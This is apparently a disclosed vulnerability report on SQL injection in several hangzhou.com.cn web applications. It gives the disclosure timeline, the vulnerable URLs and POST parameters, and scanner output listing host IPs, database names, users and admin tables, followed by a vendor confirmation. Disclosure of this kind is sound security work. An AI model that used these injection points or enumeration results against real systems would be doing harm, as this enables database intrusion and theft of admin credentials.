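2014-01-10: Details reported to the vendor; awaiting vendor handling
2014-01-15: Vendor confirmed; details disclosed to the vendor only
2014-01-25: Details disclosed to core white hats and experts in related fields
2014-02-04: Details disclosed to regular white hats
2014-02-14: Details disclosed to trainee white hats
2014-02-24: Details disclosed to the public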
POST url: http://form.hangzhou.com.cn/vote.php
data: q1664=2373&q1665%5B%5D=2377&q1665%5B%5D=2379&q1665%5B%5D=2380&vt_button=%E6%8F%90%20%E4%BA%A4&vt_btnsumbit=yes&voteid=422&q1665%5B%5D=2378

Target: http://form.hangzhou.com.cn/vote.php
Host IP: 122.224.215.10
Web Server: Apache/2.2.17 (Unix) PHP/5.2.4
Powered-by: PHP/5.2.4
DB Server: MySQL error based
Resp. Time(avg): 358 ms
Sql Version: 5.1.52-community
Current DB: vt_form
Host Name: adv
Installation dir: /
Compile OS: unknown-linux-gnu
Table found: hl_admin
Table found: hl_categories
Table found: hl_vote
Table found: hl_admintype
Table found: hl_vote_list
Table found: hl_vote_name
Table found: hl_vote_value
Table found: hl_vote_option

url: http://web.hangzhou.com.cn/kanfang/message.php
data: nickname=88952634&act=add&content=88952634&link_id=995

Target: http://web.hangzhou.com.cn/kanfang/message.php
Host IP: 61.164.38.24
Web Server: Apache
Powered-by: PHP/5.2.17p1
DB Server: MySQL error based
Resp. Time(avg): 98 ms
Sql Version: 5.5.24
Current DB: kanfang
Host Name: hzycjy
Installation dir: /usr/local/mysql
Compile OS: Linux
Table found: kf_admin
Table found: kf_link
Table found: kf_link_type
Table found: kf_message
Table found: kf_photo

Target: http://web.hangzhou.com.cn/zsjs/2013jk/article.php?nid=110
Host IP: 61.164.38.24
Web Server: Apache
Powered-by: PHP/5.2.17p1
DB Server: MySQL >=5
Resp. Time(avg): 100 ms
Current User: 2013jkzsjs@localhost
Sql Version: 5.5.24
Current DB: 2013jkzsjs
System User: 2013jkzsjs@localhost
Host Name: hzycjy
Installation dir: /usr/local/mysql
Compile OS: Linux
DB User: '2013jkzsjs'@'localhost'
Data Bases: information_schema 2013jkzsjs testables found: hl_admin,hl_admintype,hl_categories,hl_jkzsds2_answer,hl_jkzsds2_diqu,hl_jkzsds2_news,hl_jkzsds2_question,hl_jkzsds2_survey,hl_question

http://love.hangzhou.com.cn/Club_hd_hg_Content.aspx?id=88

url: http://yst.hangzhou.com.cn/message.php
data: nickname=88952634&act=add&content=88952634&question_id=131231132590

Possibly an injection point. All of these systems are exposed to the internet, and the admin back ends are exposed as well. Some of them use weak passwords, and some of the database accounts have root privileges. The travel channel may also be injectable. These should be the priority for review.
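Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-01-15 14:13
This vulnerability was caused by an oversight in development. Thank you very much for the report; we hope you will continue to help us find and fix gaps. Thanks again!!
None yet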